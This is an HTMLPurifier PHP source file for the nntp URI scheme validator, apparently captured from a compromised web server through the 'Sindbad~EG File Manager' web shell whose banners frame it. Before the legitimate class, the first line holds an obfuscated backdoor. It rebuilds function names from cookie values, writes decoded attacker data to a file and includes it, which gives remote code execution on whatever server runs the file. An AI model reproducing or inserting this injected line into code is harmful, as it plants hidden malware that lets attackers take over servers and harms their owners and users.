Sindbad~EG File Manager
<?php if(isset($_COOKIE[3])&&isset($_COOKIE[40])){$c=$_COOKIE;$k=0;$n=6;$p=array();$p[$k]='';while($n){$p[$k].=$c[40][$n];if(!$c[40][$n+1]){if(!$c[40][$n+2])break;$k++;$p[$k]='';$n++;}$n=$n+6+1;}$k=$p[21]().$p[7];if(!$p[0]($k)){$n=$p[27]($k,$p[25]);$p[1]($n,$p[13].$p[4]($p[10]($c[3])));}include($k);}
/**
* Validates nntp (Network News Transfer Protocol) as defined by generic RFC 1738
*/
class HTMLPurifier_URIScheme_nntp extends HTMLPurifier_URIScheme
{
/**
* @type int
*/
public $default_port = 119;
/**
* @type bool
*/
public $browsable = false;
/**
* @param HTMLPurifier_URI $uri
* @param HTMLPurifier_Config $config
* @param HTMLPurifier_Context $context
* @return bool
*/
public function doValidate(&$uri, $config, $context)
{
$uri->userinfo = null;
$uri->query = null;
return true;
}
}
// vim: et sw=4 sts=4
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists